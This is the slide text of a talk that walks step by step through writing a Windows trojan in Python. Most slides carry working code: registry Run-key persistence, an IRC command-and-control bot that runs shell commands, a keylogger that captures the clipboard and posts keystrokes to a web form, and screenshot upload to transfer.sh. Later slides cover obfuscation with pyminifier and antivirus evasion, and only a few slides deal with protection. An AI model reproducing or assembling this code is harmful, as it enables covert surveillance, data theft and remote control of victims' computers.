Slide 1

Slide 1 text

Hello! I'm Yan Orestes, 18 years old brazilian software developer 1 @yanorestes

Slide 2

Slide 2 text

Understanding how a malware works using Python 2

Slide 3

Slide 3 text

What is a malware? 3

Slide 4

Slide 4 text

Malware 4 malicious software

Slide 5

Slide 5 text

It's not only viruses! 5 Ransomware Virus Malware

Slide 6

Slide 6 text

Which one to pick? 6 X

Slide 7

Slide 7 text

Trojan Horse 7

Slide 8

Slide 8 text

How? 8

Slide 9

Slide 9 text

How? Python 9

Slide 10

Slide 10 text

How? Python Why? 10

Slide 11

Slide 11 text

How? Python Why? Why not? 11

Slide 12

Slide 12 text

Victim Windows (8) 12

Slide 13

Slide 13 text

13 - James Lovelock

Slide 14

Slide 14 text

Ensuring the continuous execution of the malware 14 1 .

Slide 15

Slide 15 text

Hiding the malware in other programs 15

Slide 16

Slide 16 text

Modifying Windows Registry 16

Slide 17

Slide 17 text

Registry 17 Keys Subkeys

Slide 18

Slide 18 text

HKEY_LOCAL_MACHINE Run 18

Slide 19

Slide 19 text

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Run 19

Slide 20

Slide 20 text

How to do this using Python? 20

Slide 21

Slide 21 text

How to do this using Python? ● winreg 21

Slide 22

Slide 22 text

How to do this using Python? ● winreg ● os 22

Slide 23

Slide 23 text

1. from os.path import realpath 2. from winreg import * 3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 23

Slide 24

Slide 24 text

1. from os.path import realpath 2. from winreg import * 3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 24

Slide 25

Slide 25 text

1. from os.path import realpath 2. from winreg import * 3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 25

Slide 26

Slide 26 text

1. from os.path import realpath 2. from winreg import * 3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 26

Slide 27

Slide 27 text

1. from os.path import realpath 2. from winreg import * 3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 27

Slide 28

Slide 28 text

1. from os.path import realpath 2. from winreg import * 3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 28

Slide 29

Slide 29 text

How to establish communication between attacker and victim? 29

Slide 30

Slide 30 text

Connecting the victim to the attacker 30 2.

Slide 31

Slide 31 text

Direct connection between attacker and victim 31

Slide 32

Slide 32 text

Using external services (like Twitter) 32

Slide 33

Slide 33 text

Connecting through an IRC network 33

Slide 34

Slide 34 text

How to do this using Python? 34

Slide 35

Slide 35 text

How to do this using Python? ● socket 35

Slide 36

Slide 36 text

1. import socket 2. class AttackerConnection: 3. def __init__(self, irc_address): 4. self.socket = socket.socket() 5. self.socket.connect(irc_address) 6. 7. connection = AttackerConnection(('irc.pycon.net', 6667)) 36

Slide 37

Slide 37 text

1. import socket 2. class AttackerConnection: 3. def __init__(self, irc_address): 4. self.socket = socket.socket() 5. self.socket.connect(irc_address) 6. 7. connection = AttackerConnection(('irc.pycon.net', 6667)) 37 That's it?

Slide 38

Slide 38 text

1. import socket 2. import re 3. class AttackerConnection: 4. def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 38

Slide 39

Slide 39 text

1. import socket 2. import re 3. class AttackerConnection: 4. def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 39

Slide 40

Slide 40 text

1. import socket 2. import re 3. class AttackerConnection: 4. def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 40

Slide 41

Slide 41 text

1. import socket 2. import re 3. class AttackerConnection: 4. def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 41

Slide 42

Slide 42 text

1. import socket 2. import re 3. class AttackerConnection: 4. def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 42

Slide 43

Slide 43 text

1. import socket 2. import re 3. class AttackerConnection: 4. def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 43

Slide 44

Slide 44 text

1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. while True: 3. cmd = connection.receive_command() 4. # Handle command Main Loop 44

Slide 45

Slide 45 text

How to take control of the victim's computer? 45

Slide 46

Slide 46 text

Executing commands on the victim's computer 46 3.

Slide 47

Slide 47 text

Using os.system() 47

Slide 48

Slide 48 text

48 Using subprocess module

Slide 49

Slide 49 text

49 Using subprocess module

Slide 50

Slide 50 text

50

Slide 51

Slide 51 text

51

Slide 52

Slide 52 text

52 1. from subprocess import run, PIPE, STDOUT 2. 3. def run_command_on_shell(cmd): 4. process_complete = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. response = process_complete.stdout.decode('utf8', errors='ignore') 6. return response

Slide 53

Slide 53 text

53 but what about the communication with the attacker? 1. from subprocess import run, PIPE, STDOUT 2. 3. def run_command_on_shell(cmd): 4. process_complete = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. response = process_complete.stdout.decode('utf8', errors='ignore') 6. return response

Slide 54

Slide 54 text

54 1. class AttackerConnection: 2. # Code omitted 3. def parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted

Slide 55

Slide 55 text

55 1. class AttackerConnection: 2. # Code omitted 3. def parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted

Slide 56

Slide 56 text

56 1. class AttackerConnection: 2. # Code omitted 3. def parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted

Slide 57

Slide 57 text

57 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands = {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))

Slide 58

Slide 58 text

58 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands = {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))

Slide 59

Slide 59 text

59 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands = {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))

Slide 60

Slide 60 text

60 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands = {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))

Slide 61

Slide 61 text

61 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands = {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))

Slide 62

Slide 62 text

Capturing user data in real time 62 4.

Slide 63

Slide 63 text

Capturing pressed keys (keylogger) 63

Slide 64

Slide 64 text

64 How to do this using Python?

Slide 65

Slide 65 text

● keyboard https://github.com/boppreh/keyboard 65 How to do this using Python?

Slide 66

Slide 66 text

● keyboard ● requests http://docs.python-requests.org/en/master 66 How to do this using Python?

Slide 67

Slide 67 text

● keyboard ● requests ● pyperclip https://github.com/asweigart/pyperclip 67 How to do this using Python?

Slide 68

Slide 68 text

1. import keyboard 2. 3. pressed_keys = [] 4. keyboard.on_press(lambda k: pressed_keys.append(k.name)) 68

Slide 69

Slide 69 text

Hello, world! 69 1. import keyboard 2. 3. pressed_keys = [] 4. keyboard.on_press(lambda k: pressed_keys.append(k.name))

Slide 70

Slide 70 text

Hello, world! shiftHello,spaceworldshift! 70 1. import keyboard 2. 3. pressed_keys = [] 4. keyboard.on_press(lambda k: pressed_keys.append(k.name))

Slide 71

Slide 71 text

1. import keyboard 2. 3. pressed_keys = [] 4. special_keys = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 71

Slide 72

Slide 72 text

1. import keyboard 2. 3. pressed_keys = [] 4. special_keys = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 72

Slide 73

Slide 73 text

1. import keyboard 2. 3. pressed_keys = [] 4. special_keys = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 73

Slide 74

Slide 74 text

1. import keyboard 2. 3. pressed_keys = [] 4. special_keys = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 74

Slide 75

Slide 75 text

1. import keyboard 2. 3. pressed_keys = [] 4. special_keys = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 75 and how does the attacker access this?

Slide 76

Slide 76 text

1. from requests import post 2. 3. url_form = #linkToForm# 4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 76

Slide 77

Slide 77 text

1. from requests import post 2. 3. url_form = #linkToForm# 4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 77

Slide 78

Slide 78 text

1. from requests import post 2. 3. url_form = #linkToForm# 4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 78

Slide 79

Slide 79 text

79 1. from requests import post 2. 3. url_form = #linkToForm# 4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text})

Slide 80

Slide 80 text

Golden touch 80

Slide 81

Slide 81 text

1. from pyperclip import paste 2. 3. def handle_copypaste(): 4. copied_text = paste() 5. pressed_keys.extend(list(copied_text)) 6. 7. keyboard.add_hotkey('ctrl+c', handle_copypaste) 81 Golden touch

Slide 82

Slide 82 text

Capturing the victim's screen 82

Slide 83

Slide 83 text

83 How to do this using Python?

Slide 84

Slide 84 text

● pyscreenshot https://github.com/ponty/pyscreenshot 84 How to do this using Python?

Slide 85

Slide 85 text

● pyscreenshot ● os 85 How to do this using Python?

Slide 86

Slide 86 text

● pyscreenshot ● os ● requests 86 How to do this using Python?

Slide 87

Slide 87 text

1. from pyscreenshot import grab_to_file 2. 3. def take_screenshot(filename): 4. grab_to_file(filename) 87

Slide 88

Slide 88 text

1. from pyscreenshot import grab_to_file 2. 3. def take_screenshot(filename): 4. grab_to_file(filename) 5. 6. commands = {'!shell': run_command_on_shell, '!screenshot': take_screenshot} 88

Slide 89

Slide 89 text

1. from pyscreenshot import grab_to_file 2. 3. def take_screenshot(filename): 4. grab_to_file(filename) 5. 6. commands = {'!shell': run_command_on_shell, '!screenshot': take_screenshot} 89 and how does the attacker access this?

Slide 90

Slide 90 text

1. from pyscreenshot import grab_to_file 2. from requests import post 3. 4. def take_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. response = r.text if r.status_code == 200 else 'Upload error' 9. return response 90

Slide 91

Slide 91 text

1. from pyscreenshot import grab_to_file 2. from requests import post 3. 4. def take_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. response = r.text if r.status_code == 200 else 'Upload error' 9. return response 91

Slide 92

Slide 92 text

1. from os import remove 2. from pyscreenshot import grab_to_file 3. from requests import post 4. 5. def take_screenshot(filename): 6. grab_to_file(filename) 7. with open(filename, 'rb') as f: 8. r = post('https://transfer.sh', files={filename: f}) 9. response = r.text if r.status_code == 200 else 'Upload error' 10. return response 11. remove(filename) 92

Slide 93

Slide 93 text

Extra! 93

Slide 94

Slide 94 text

Code obfuscation 94 5.

Slide 95

Slide 95 text

Bytecode compilation 95

Slide 96

Slide 96 text

Using pyminifier 96

Slide 97

Slide 97 text

97 Using pyminifier 1. pyminifier -O -o level1.py malware.py

Slide 98

Slide 98 text

98 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2. pyminifier -O --nonlatin -o level2.py malware.py

Slide 99

Slide 99 text

99 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2. pyminifier -O --nonlatin -o level2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o level3.py malware.py

Slide 100

Slide 100 text

100 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2. pyminifier -O --nonlatin -o level2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o level3.py malware.py 4. pyminifier -O --nonlatin --replacement-length=100 --gzip -o level4.py malware.py

Slide 101

Slide 101 text

Privilege escalation 101 6.

Slide 102

Slide 102 text

Privilege escalation 102 6. ● Brute force

Slide 103

Slide 103 text

Privilege escalation 103 6. ● Brute force ● Code injection

Slide 104

Slide 104 text

104 How can users protect themselves?

Slide 105

Slide 105 text

Precaution 105

Slide 106

Slide 106 text

Control of the connections 106

Slide 107

Slide 107 text

Antivirus? 107

Slide 108

Slide 108 text

108 - Anonymous expert in everything

Slide 109

Slide 109 text

109 - Anonymous expert in everything Is it?

Slide 110

Slide 110 text

Antivirus are annoying 110

Slide 111

Slide 111 text

111 Unexpected renovation costs Antivirus are annoying

Slide 112

Slide 112 text

112 Unexpected renovation costs System problems Antivirus are annoying

Slide 113

Slide 113 text

112 Unexpected renovation costs System problems :( Antivirus are annoying

Slide 114

Slide 114 text

2010 - McAfee case 113

Slide 115

Slide 115 text

2010 - McAfee case 114 2011 - MSE case

Slide 116

Slide 116 text

2010 - McAfee case 115 2011 - MSE case 2012 - Sophos case

Slide 117

Slide 117 text

Low effectiveness 116 2006 - 40-50% 2007 - 20-30%

Slide 118

Slide 118 text

Low effectiveness? 117 2006 - 40-50% 2007 - 20-30% 2013 - 91.1-99.9%

Slide 119

Slide 119 text

118 Humans fail

Slide 120

Slide 120 text

● Don't share files and/or links with anyone ● Don't allow anyone besides you to use your computes ● Don't use Internet for shopping, adult entertainment or online games ● Never uses public WiFi ● Don't share your private WiFi with anyone ● Never clicks in any ads ● Always uses extremely safe passwords and never repeats it on different applications ● Don't use a smartphone ● Don't download anything through the Internet Unless you... 119

Slide 121

Slide 121 text

● Don't share files and/or links with anyone ● Don't allow anyone besides you to use your computes ● Don't use Internet for shopping, adult entertainment or online games ● Never uses public WiFi ● Don't share your private WiFi with anyone ● Never clicks in any ads ● Always uses extremely safe passwords and never repeats it on different applications ● Don't use a smartphone ● Don't download anything through the Internet ● Don't use an operational system Unless you... 120

Slide 122

Slide 122 text

Protection against antivirus 121 7. ●

Slide 123

Slide 123 text

Protection against antivirus 122 7. ● Signature => Polymorphic code

Slide 124

Slide 124 text

Protection against antivirus 123 7. ● Signature => Polymorphic code ● Sandbox => Detection (mouse) https://github.com/boppreh/mouse/

Slide 125

Slide 125 text

Protection against antivirus 124 7. ● Signature => Polymorphic code ● Sandbox => Detection (mouse) ● Heuristic method => ?

Slide 126

Slide 126 text

Thank you! Any question? 125 https://speakerdeck.com/yanorestes/creating-a-malware-using-python [email protected]